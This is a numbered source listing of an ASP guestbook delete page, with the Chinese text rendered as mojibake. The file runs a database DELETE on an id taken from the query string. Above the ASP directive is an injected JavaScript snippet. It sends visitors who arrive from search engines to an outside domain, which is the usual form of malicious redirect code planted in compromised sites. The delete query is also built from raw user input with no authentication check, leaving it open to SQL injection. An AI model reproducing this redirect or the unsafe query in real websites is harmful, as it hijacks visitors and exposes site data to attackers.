d:\wwwroot\wuchunhua\ͨѶ¼\xys\delok.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
<%
@LANGUAGE="VBSCRIPT"
%
>
002:
<!--#include file="Connections/conn.asp" -->
003:
<%
004:
005:
if(request.querystring("id") <> "") then Command1__ddd = request.querystring("id")
006:
007:
%
>
008:
<%
009:
010:
set Command1 = Server.CreateObject("ADODB.Command")
011:
Command1.ActiveConnection = MM_conn_STRING
012:
Command1.CommandText = "DELETE FROM xybook WHERE id in (" + Replace(Command1__ddd, "'", "''") + ")"
013:
Command1.CommandType = 1
014:
Command1.CommandTimeout = 0
015:
Command1.Prepared = true
016:
Command1.Execute()
017:
018:
%
>
019:
<html>
020:
<head>
021:
<title>ÆÀÂ۳ɹ¦</title>
022:
<meta http-equiv="content-type" content="text/html; charset=gb2312">
023:
<meta http-equiv="refresh" content="2;URL=del.asp">
024:
</head>
025:
<body bgcolor="#ffffff">
026:
<fieldset style='width:152' align=center><legend><b> ɾ³ý</b></legend><legend><b>³É¹¦</b></legend>
027:
<ul>
028:
<img src="images/loading.gif" width="94" height="17"><br>
029:
<br>
030:
<br>
031:
<font size="2">¡þÕýÔÚ·µ»Ø¡þ</font><br>
032:
</ul>
033:
</fieldset>
034:
</body>
035:
</html>
036:
037:
038: